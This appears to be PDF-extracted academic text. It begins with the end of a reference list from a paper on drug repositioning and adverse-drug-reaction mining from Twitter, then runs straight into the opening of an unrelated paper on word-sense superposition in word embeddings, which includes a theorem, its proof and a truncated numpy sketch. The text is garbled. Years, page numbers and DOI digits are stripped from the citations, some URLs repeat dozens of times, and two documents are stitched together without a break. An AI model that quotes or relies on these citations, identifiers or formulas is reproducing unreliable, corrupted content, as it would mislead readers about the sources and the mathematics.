ghofrani ha, osterloh ih, grimminger f. . sildenafil: from angina to erectile dysfunction to pulmonary hypertension and beyond. nature reviews drug discovery ( ): – doi . /nrd .
gimpl g, wiegand v, burger k, fahrenholz f. . cholesterol and steroid hormones: modulators of oxytocin receptor function. progress in brain research : – .
ginn r, pimpalkhute p, nikfarjam a, pakti a, o'connor k, sarker a, smith k, gonzalez g. . mining twitter for adverse drug reaction mentions: a corpus and classification benchmark. in: proceedings of the th workshop on building and evaluating resources for health and biomedical text processing, – .
hastie t, tibshirani r, wainwright m. . statistical learning with sparsity: the lasso and generalizations. boca raton: crc press.
hazell l, shakir sa. . under-reporting of adverse drug reactions: a systematic review. drug safety ( ): – doi . / - - .
hu g, agarwal p. . human disease-drug network based on genomic expression profiles. plos one ( ):e doi . /journal.pone. .
hurle mr, yang l, xie q, rajpal dk, sanseau p, agarwal p. . computational drug repositioning: from data to therapeutics. clinical pharmacology and therapeutics ( ): – doi . /clpt. . .
internet live stats. . twitter usage statistics. available at http://www.internetlivestats.com/twitter-statistics/ (accessed april ).
iorio f, bosotti r, scacheri e, belcastro v, mithbaokar p, ferriero r, murino l, tagliaferri r, brunetti-pierri n, isacchi a, di bernardo d. . discovery of drug mode of action and drug repositioning from transcriptional responses. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. .
jarvis l. . teaching an old drug new tricks. chemical and engineering news ( ): – .
jones n. . too few women in clinical trials? nature epub ahead of print jun doi . /news. . .
jones dt, buchan dw, cozzetto d, pontil m. . psicov: precise structural contact prediction using sparse inverse covariance estimation on large multiple sequence alignments. bioinformatics ( ): – doi . /bioinformatics/btr .
jung sh, park j-m, moon e, chung yi, lee bd, lee ym, kim jh, kim sy, jeong hj. . delay in the recovery of normal sleep-wake cycle after disruption of the light-dark cycle in mice: a bipolar disorder-prone animal model? psychiatry investigation ( ): – doi . /pi. . . . .
karimi s, wang c, metke-jimenez a, gaire r, paris c. . text and data mining techniques in adverse drug reaction detection. acm computing surveys ( ): : – : doi . / .
kohler s, bauer s, horn d, robinson pn. . walking the interactome for prioritization of candidate disease genes. american journal of human genetics ( ): – doi . /j.ajhg. . . .
kovács ia, mizsei r, csermely p. . a unified data representation theory for network visualization, ordering and coarse-graining. arxiv: article . .
krauthammer m, kaufmann ca, gilliam tc, rzhetsky a. . molecular triangulation: bridging linkage and molecular-network information for identifying candidate genes in alzheimer's disease. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. .
kuhn m, campillos m, letunic i, jensen lj, bork p. . a side effect resource to capture phenotypic effects of drugs. molecular systems biology : doi . /msb. . .
ladenheim ee. . liraglutide and obesity: a review of the data so far. drug design, development and therapy : – doi . /dddt.s .
lamb j, crawford ed, peck d, modell jw, blat ic, wrobel mj, lerner j, brunet jp, subramanian a, ross kn, reich m, hieronymus h, wei g, armstrong sa, haggarty sj, clemons pa, wei r, carr sa, lander es, golub tr. . the connectivity map: using gene-expression signatures to connect small molecules, genes, and disease. science ( ): – doi . /science. .
leaman r, wojtulewicz l, sullivan r, skariah a, yang j, gonzalez g. . towards internet-age pharmacovigilance: extracting adverse drug reactions from user posts to health-related social networks. in: proceedings of the workshop on biomedical natural language processing. bionlp ' . stroudsburg: association for computational linguistics, – . available at http://dl.acm.org/citation.cfm?id= .
ledoit o, wolf m. . honey, i shrunk the sample covariance matrix. in: upf economics and business working paper. .
lee pr, brady dl, shapiro ra, dorsa dm, koenig ji. . social interaction deficits caused by chronic phencyclidine administration are reversed by oxytocin. neuropsychopharmacology ( ): – doi . /sj.npp. .
li m, marubayashi a, nakaya y, fukui k, arase s. . minoxidil-induced hair growth is mediated by adenosine in cultured dermal papilla cells: possible involvement of sulfonylurea receptor b as a target of minoxidil. journal of investigative dermatology ( ): – doi . /j. - x. . .x.
lopes ct, franz m, kazi f, donaldson sl, morris q, bader gd. . cytoscape web: an interactive web-based network browser. bioinformatics ( ): – doi . /bioinformatics/btq .
lopez-gonzalez e, herdeiro mt, figueiras a. . determinants of under-reporting of adverse drug reactions: a systematic review. drug safety ( ): – doi . / - - .
mazumder r, hastie t. . exact covariance thresholding into connected components for large-scale graphical lasso. journal of machine learning research : – .
meinshausen n, bühlmann p. . high-dimensional graphs and variable selection with the lasso. in: the annals of statistics. beachwood: institute of mathematical statistics, – .
mikolov t, chen k, corrado g, dean j. . efficient estimation of word representations in vector space. arxiv preprint. arxiv: . .
nicolson se, nemeroff cb. . ziprasidone in the treatment of mania in bipolar disorder. neuropsychiatric disease and treatment ( ): – .
nikfarjam a, sarker a, o'connor k, ginn r, gonzalez g. . pharmacovigilance from social media: mining adverse drug reaction mentions using sequence labeling with word embedding cluster features. journal of the american medical informatics association ( ): – doi . /jamia/ocu .
ogino k, hatanaka k, kawamura m, ohno t, harada y. . meloxicam inhibits prostaglandin e( ) generation via cyclooxygenase in the inflammatory site but not that via cyclooxygenase in the stomach. pharmacology ( ): – doi . / .
owen rt. . ramelteon: profile of a new sleep-promoting medication. drugs today ( ): – doi . /dot. . . . .
pedersen ca, gibson cm, rau sw, salimi k, smedley kl, casey rl, leserman j, jarskog lf, penn dl. . intranasal oxytocin reduces psychotic symptoms and improves theory of mind and social perception in schizophrenia. schizophrenia research ( ): – doi . /j.schres. . . .
rainsford kd, ying c, smith fc. . effects of meloxicam, compared with other nsaids, on cartilage proteoglycan metabolism, synovial prostaglandin e , and production of interleukins , and , in human and porcine explants in organ culture. journal of pharmacy and pharmacology ( ): – doi . /j. - . .tb .x.
ray sd. . side effects of drugs annual: a worldwide yearly survey of new data in adverse drug reactions. vol. . amsterdam: elsevier science, – .
reinholt fp, hultenby k, oldberg a, heinegard d. . osteopontin—a possible anchor of osteoclasts to bone. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . . .
rubin lh, carter cs, drogos l, pournajafi-nazarloo h, sweeney ja, maki pm. . peripheral oxytocin is associated with reduced symptom severity in schizophrenia. schizophrenia research ( – ): – doi . /j.schres. . . .
sampathkumar h, chen xw, luo b. . mining adverse drug reactions from online healthcare forums using hidden markov model. bmc medical informatics and decision making : doi . / - - - .
sanseau p, agarwal p, barnes mr, pastinen t, richards jb, cardon lr, mooser v. . use of genome-wide association studies for drug repositioning. nature biotechnology ( ): – doi . /nbt. .
available at http://thomsonreuters.com/products/ip-science/ /drug-repositioning-cwp-en.pdf. thomson reuters. a. thomson reuters cortellis clinical trials intelligence. available at http: //go.thomsonreuters.com/cti/ (accessed april ). thomson reuters. b. thomson reuters world drug index. available at http://thomsonreuters. com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ (accessed april ). tobinick el. . the value of drug repositioning in the current pharmaceutical market. drug news & perspectives ( ): – doi . /dnp. . . . . twitter. . twitter.com. available at http://twitter.com/ (accessed april ). us food and drug administraction. . drugs@fda: fda approved drug products. available at http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ (accessed april ). vanunu o, magger o, ruppin e, shlomi t, sharan r. . associating genes and protein complexes with disease via network propagation. plos computational biology ( ):e doi . /journal.pcbi. . vilar s, uriarte e, santana l, lorberbaum t, hripcsak g, friedman c, tatonetti np. . similarity-based modeling in large-scale prediction of drug–drug interactions. nature protocols ( ): – doi . /nprot. . . wang h, gu q, wei j, cao z, liu q. . mining drug-disease relationships as a complement to medical genetics-based drug repositioning: where a recommendation system meets genome-wide association studies. clinical pharmacology and therapeutics ( ): – doi . /cpt. . nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /j.jbi. . . http://dx.doi.org/ . / - . http://dx.doi.org/ . / - - -s -s http://dx.doi.org/ . /fj. - http://dx.doi.org/ . /scitranslmed. http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf http://apps.cs.utexas.edu/tech_reports/reports/tr/tr- .pdf 
http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://thomsonreuters.com/en/products-services/pharma-life-sciences/life-science-research/world-drug-index.html/ http://dx.doi.org/ . /dnp. . . . 
http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://twitter.com/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://www.accessdata.fda.gov/scripts/cder/drugsatfda/ http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /nprot. . http://dx.doi.org/ . /cpt. http://dx.doi.org/ . /peerj-cs. wang zy, zhang hy. . rational drug repositioning by medical genetics. 
nature biotechnology ( ): – doi . /nbt. . wang f, zhang p, cao n, hu j, sorrentino r. . exploring the associations between drug side-effects and therapeutic indications. journal of biomedical informatics : – doi . /j.jbi. . . . wheater g, hogan ve, teng yko, tekstra j, lafeber fp, huizinga twj, bijlsma jwj, francis rm, tuck sp, datta hk, van laar jm. . suppression of bone turnover by b-cell depletion in patients with rheumatoid arthritis. osteoporosis international ( ): – doi . /s - - - . wu y-h, ursinus j, zhou j-n, scheer fajl, ai-min b, jockers r, van heerikhuize j, swaab df. . alterations of melatonin receptors mt and mt in the hypothalamic suprachiasmatic nucleus during depression. journal of affective disorders ( – ): – doi . /j.jad. . . . xie l, kinnings s, xie l, bourne p. . predicting the polypharmacology of drugs: identifying new uses through chemoinformatics, structural informatics, and molecular modeling-based approaches. in: barratt m, frai d, eds. drug repositioning: bringing new life to shelved assets and existing drugs. hoboken: john wiley & sons. yang l, agarwal p. . systematic drug repositioning based on clinical side-effects. plos one ( ):e doi . /journal.pone. . ye h, liu q, wei j. . construction of drug network based on side effects and its application for drug repositioning. plos one ( ):e doi . /journal.pone. . zeng qt, crowell j, divita g, roth l, browne ac. . identifying consumer-friendly display (cfd) names for health concepts. in: amia annual symposium proceedings, – . available at http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc /. zhang j, jiang k, lv l, wang h, shen z, gao z, wang b, yang y, ye y, wang s. . use of genome-wide association studies for cancer research and drug repositioning. plos one ( ):e doi . /journal.pone. . zhang p, wang f, hu j, sorrentino r. . exploring the relationship between drug side-effects and therapeutic indications. amia annual symposium proceedings : – . nugent et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /nbt. http://dx.doi.org/ . /j.jbi. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.jad. . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /journal.pone. 
http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://http: //www.ncbi.nlm.nih.gov/pmc/articles/pmc / http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. 
linear algebraic structure of word senses, with applications to polysemy
sanjeev arora, yuanzhi li, yingyu liang, tengyu ma, andrej risteski
computer science department, princeton university, olden st, princeton, nj
{arora,yuanzhil,yingyul,tengyu,risteski}@cs.princeton.edu

abstract
word embeddings are ubiquitous in nlp and information retrieval, but it is unclear what they represent when the word is polysemous. here it is shown that multiple word senses reside in linear superposition within the word embedding and simple sparse coding can recover vectors that approximately capture the senses. the success of our approach, which applies to several embedding methods, is mathematically explained using a variant of the random walk on discourses model (arora et al., ). a novel aspect of our technique is that each extracted word sense is accompanied by one of about "discourse atoms" that gives a succinct description of which other words co-occur with that word sense. discourse atoms can be of independent interest, and make the method potentially more useful. empirical tests are used to verify and support the theory.

introduction
word embeddings are constructed using firth's hypothesis that a word's sense is captured by the distribution of other words around it (firth, ). classical vector space models (see the survey by turney and pantel ( )) use simple linear algebra on the matrix of word-word co-occurrence counts, whereas recent neural network and energy-based models such as word2vec use an objective that involves a nonconvex (thus, also nonlinear) function of the word co-occurrences (bengio et al., ; mikolov et al., a; mikolov et al., b). this nonlinearity makes it hard to discern how these modern embeddings capture the different senses of a polysemous word. the monolithic view of embeddings, with the internal information extracted only via inner product, is felt to fail in capturing word senses (griffiths et al., ; reisinger and mooney, ; iacobacci et al., ). researchers have instead sought to capture polysemy using more complicated representations, e.g., by inducing separate embeddings for each sense (murphy et al., ; huang et al., ). these embedding-per-sense representations grow naturally out of classic word sense induction or wsi (yarowsky, ; schutze, ; reisinger and mooney, ; di marco and navigli, ) techniques that perform clustering on neighboring words.
the current paper goes beyond this monolithic view, by describing how multiple senses of a word actually reside in linear superposition within the standard word embeddings (e.g., word2vec (mikolov et al., a) and glove (pennington et al., )). by this we mean the following: consider a polysemous word, say tie, which can refer to an article of clothing, or a drawn match, or a physical act. let's take the usual viewpoint that tie is a single token that represents monosemous words tie1, tie2, ....
the theory and experiments in this paper strongly suggest that word embeddings computed using modern techniques such as glove and word2vec satisfy:

v_tie ≈ α1·v_tie1 + α2·v_tie2 + α3·v_tie3 + · · ·   ( )

where the coefficients αi are nonnegative and v_tie1, v_tie2, etc., are the hypothetical embeddings of the different senses, i.e., those that would have been induced in the thought experiment where all occurrences of the different senses were hand-labeled in the corpus. this linearity assertion, whereby linear structure appears out of a highly nonlinear embedding technique, is explained theoretically in section , and then empirically tested in a couple of ways in section .
section uses the linearity assertion to show how to do wsi via sparse coding, which can be seen as a linear algebraic analog of the classic clustering-based approaches, albeit with overlapping clusters. on standard testbeds it is competitive with earlier embedding-for-each-sense approaches (section ). a novelty of our wsi method is that it automatically links different senses of different words via our atoms of discourse (section ). this can be seen as an answer to the suggestion in (reisinger and mooney, ) to enhance one-embedding-per-sense methods so that they can automatically link together senses for different words, e.g., recognize that the "article of clothing" sense of tie is connected to shoe, jacket, etc.
this paper is inspired by the solution of word analogies via linear algebraic methods (mikolov et al., b), and the use of sparse coding on word embeddings to get useful representations for many nlp tasks (faruqui et al., ). our theory builds conceptually upon the random walk on discourses model of arora et al. ( ), although we make a small but important change to explain empirical findings regarding polysemy. our wsi procedure applies (with minor variation in performance) to canonical embeddings such as word2vec and glove as well as the older vector space methods such as pmi (church and hanks, ). this is not surprising since these embeddings are known to be interrelated (levy and goldberg, ; arora et al., ).

justification for linearity assertion
since word embeddings are solutions to nonconvex optimization problems, at first sight it appears hopeless to reason about their finer structure. but it becomes possible to do so using a generative model for language (arora et al., ), a dynamic version of the log-linear topic model of (mnih and hinton, ), which we now recall. it posits that at every point in the corpus there is a micro-topic ("what is being talked about") called discourse that is drawn from the continuum of unit vectors in ℜ^d. the parameters of the model include a vector v_w ∈ ℜ^d for each word w. each discourse c defines a distribution over words pr[w | c] ∝ exp(c · v_w). the model assumes that the corpus is generated by the slow geometric random walk of c over the unit sphere in ℜ^d: when the walk is at c, a few words are emitted by i.i.d. samples from this distribution, which, due to its log-linear form, strongly favors words close to c in cosine similarity. estimates for learning the parameters v_w using mle and moment methods correspond to standard embedding methods such as glove and word2vec (see the original paper).
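as a concrete illustration of this generative process (not part of the paper's experiments: the vocabulary size, dimension, and random word vectors below are made-up toy values), the following numpy sketch emits one window of words from a fixed discourse vector c according to pr[w | c] ∝ exp(c · v_w):

```python
import numpy as np

rng = np.random.default_rng(0)

d = 50             # embedding dimension (toy value)
vocab_size = 1000  # toy vocabulary
n_window = 10      # words emitted while the walk sits at one discourse

# toy word vectors; in the model these are the unknown parameters v_w
V = rng.normal(size=(vocab_size, d)) / np.sqrt(d)

def emit_window(c, V, n):
    """sample n words i.i.d. from pr[w | c] ∝ exp(c · v_w)."""
    logits = V @ c
    logits -= logits.max()   # numerical stability
    p = np.exp(logits)
    p /= p.sum()             # this normalizer is the partition function z_c
    return rng.choice(len(V), size=n, p=p)

# a single discourse vector on the unit sphere (the state of the random walk)
c = rng.normal(size=d)
c /= np.linalg.norm(c)

print(emit_window(c, V, n_window))
```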
to study how word embeddings capture word senses, we'll need to understand the relationship between a word's embedding and those of words it co-occurs with. in the next subsection, we propose a slight modification to the above model and show how to infer the embedding of a word from the embeddings of other words that co-occur with it. this immediately leads to the linearity assertion, as shown in section . .

. gaussian walk model
as alluded to before, we modify the random walk model of (arora et al., ) to the gaussian random walk model. again, the parameters of the model include a vector v_w ∈ ℜ^d for each word w. the model assumes the corpus is generated as follows. first, a discourse vector c is drawn from a gaussian with mean 0 and covariance Σ. then, a window of n words w_1, w_2, . . . , w_n is generated from c by

pr[w_1, w_2, . . . , w_n | c] = ∏_{i=1..n} pr[w_i | c],   ( )
pr[w_i | c] = exp(c · v_{w_i}) / Z_c,   ( )

where Z_c = Σ_w exp(⟨v_w, c⟩) is the partition function. we also assume the partition function concentrates, in the sense that Z_c ≈ Z exp(∥c∥²/2) for some constant Z. this is a direct extension of (arora et al., , lemma . ) to discourse vectors with norm other than 1, and causes the additional term exp(∥c∥²/2); the formal proof of (arora et al., ) still applies in this setting. the simplest way to informally justify this assumption is to assume the v_w are random vectors, in which case Z_c can be shown to concentrate around exp(∥c∥²/2); such a condition enforces the word vectors to be isotropic to some extent, and makes the covariance of the discourse identifiable.

theorem . assume the above generative model, and let s denote the random variable of a window of n words. then, there is a linear transformation a such that

v_w ≈ a · e[ (1/n) Σ_{w_i ∈ s} v_{w_i} | w ∈ s ].

proof. let c_s be the discourse vector for the whole window s. by the law of total expectation, we have

e[c_s | w ∈ s] = e[ e[c_s | s = w_1 . . . w_{j−1} w w_{j+1} . . . w_n] | w ∈ s ].   ( )

we evaluate the two sides of this equation. first, by bayes' rule and the assumptions on the distribution of c and the partition function, we have

p(c | w) ∝ p(w | c) p(c) ∝ (1/Z_c) exp(⟨v_w, c⟩) · exp(−(1/2) c^⊤ Σ^{−1} c) ≈ (1/Z) exp(⟨v_w, c⟩ − (1/2) c^⊤ (Σ^{−1} + i) c),

so c | w is a gaussian distribution with mean

e[c | w] ≈ (Σ^{−1} + i)^{−1} v_w.   ( )

next, we compute e[c | w_1, . . . , w_n]. again using bayes' rule and the assumptions on the distribution of c and the partition function,

p(c | w_1, . . . , w_n) ∝ p(w_1, . . . , w_n | c) p(c) ∝ p(c) ∏_{i=1..n} p(w_i | c) ≈ (1/Z^n) exp( Σ_{i=1..n} v_{w_i}^⊤ c − (1/2) c^⊤ (Σ^{−1} + n·i) c ),

so c | w_1, . . . , w_n is a gaussian distribution with mean

e[c | w_1, . . . , w_n] ≈ (Σ^{−1} + n·i)^{−1} Σ_{i=1..n} v_{w_i}.   ( )

now plugging equations ( ) and ( ) into equation ( ), we conclude that

(Σ^{−1} + i)^{−1} v_w ≈ (Σ^{−1} + n·i)^{−1} e[ Σ_{i=1..n} v_{w_i} | w ∈ s ].

re-arranging the equation completes the proof with a = n (Σ^{−1} + i)(Σ^{−1} + n·i)^{−1}.

note: interpretation. theorem shows that there exists a linear relationship between the vector of a word and the vectors of the words in its contexts. consider the following thought experiment. first, choose a word w. then, for each window s containing w, take the average of the vectors of the words in s and denote it as v_s. now, take the average of v_s over all the windows s containing w, and denote this average as u. theorem says that u can be mapped to the word vector v_w by a linear transformation that does not depend on w. this linear structure may also have connections to some other phenomena related to linearity, e.g., gittens et al. ( ) and tian et al. ( ). exploring such connections is left for future work.
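the closed form a = n(Σ^{−1} + i)(Σ^{−1} + n·i)^{−1} from the proof is straightforward to compute once Σ is known or estimated. the sketch below uses a made-up toy Σ (an assumption for illustration, not an estimate from data) and checks numerically that, in the eigenbasis of Σ, a is diagonal with entries (n + nλ_i)/(1 + nλ_i), so directions with large discourse variance λ_i are shrunk relative to the others: the smoothing effect discussed next.

```python
import numpy as np

rng = np.random.default_rng(1)

d = 50   # embedding dimension (toy value)
n = 10   # window size (toy value)

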